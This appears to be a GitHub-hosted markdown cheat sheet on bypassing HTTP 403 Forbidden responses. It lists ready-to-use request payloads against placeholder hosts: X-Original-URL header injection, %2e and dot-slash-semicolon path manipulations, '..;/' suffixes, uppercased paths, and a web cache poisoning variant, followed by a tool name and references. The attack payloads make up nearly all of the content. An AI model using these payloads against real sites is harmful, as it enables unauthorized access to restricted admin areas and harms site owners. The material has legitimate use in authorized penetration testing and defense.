Bypass 403 (Forbidden)

Using "X-Original-URL" header

GET /admin HTTP/1.1
Host: target.com

Try this to bypass

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

Appending %2e after the first slash

http://target.com/admin => 403

Try this to bypass

http://target.com/%2e/admin => 200

Try add dot (.) slash (/) and semicolon (;) in the URL

http://target.com/admin => 403

Try this to bypass

http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200

Add "..;/" after the directory name

http://target.com/admin

Try this to bypass

http://target.com/admin..;/

Try to uppercase the alphabet in the url

http://target.com/admin

Try this to bypass

http://target.com/aDmIN

Via Web Cache Poisoning

GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin

Tools

Bypass-403 | Go script for bypassing 403 forbidden

References

@iam_j0ker
Hacktricks

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Bypass 403.md

Bypass 403.md

Bypass 403 (Forbidden)

Tools

References

Files

Bypass 403.md

Latest commit

History

Bypass 403.md

File metadata and controls

Bypass 403 (Forbidden)

Tools

References